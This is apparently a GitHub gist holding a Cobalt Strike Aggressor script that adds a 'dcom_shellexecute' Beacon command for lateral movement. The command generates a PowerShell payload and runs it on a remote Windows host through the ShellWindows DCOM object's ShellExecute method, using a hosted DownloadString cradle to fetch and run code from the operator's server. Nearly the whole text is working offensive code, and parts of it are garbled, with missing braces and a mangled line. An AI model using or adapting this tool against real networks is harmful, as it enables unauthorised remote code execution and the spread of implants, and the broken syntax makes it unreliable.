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Forked from 001SPARTaN/dcom_shellexecute.cna
Created May 31, 2018 02:45
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# Lateral movement techniques based on research by enigma0x3 (Matt Nelson)
# Beacon implementation based on comexec.cna by Raphael Mudge
# Register alias
beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)",
"Usage: dcom_shellexecute [target] [listener]\n\n" .
"Spawn new Beacon on a target via DCOM ShellExecute Object.");
# Alias for dcom_shellexecute
alias dcom_shellexecute {
if ($3 is $null) {
# If no listener specified, allow user to choose
dcom_shellexecute($bid, $target, $1);
}, $bid => $1, $target => $2));
else {
dcom_shellexecute($1, $2, $3);
sub dcom_shellexecute {
local('$payload $cmd');
# Acknowledge task
btask($1, "Tasked Beacon to run (" . listener_describe($3, $2) . ") via DCOM ShellExecute");
# Generate PowerShell one-liner for payload
$payload = powershell($3, true, "x86");
$payload = strrep($payload, "powershell.exe ", "");
# Create new DCOM ShellExecute object on remote host
$cmd = '[Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "';
$cmd .= $2;
$cmd .= '")).Item().Document.Application.ShellExecute("powershell.exe", "';
$cmd .= $payload;
$cmd .= '", "C:\Windows\System32\WindowsPowershell\v1.0",';
$cmd .= '$null,0)';
# Use beacon_host_script to generate a shorter DownloadString
# payload that we can use w/ make_token
$short = beacon_host_script($1, $cmd);
bpowershell($1, $short);
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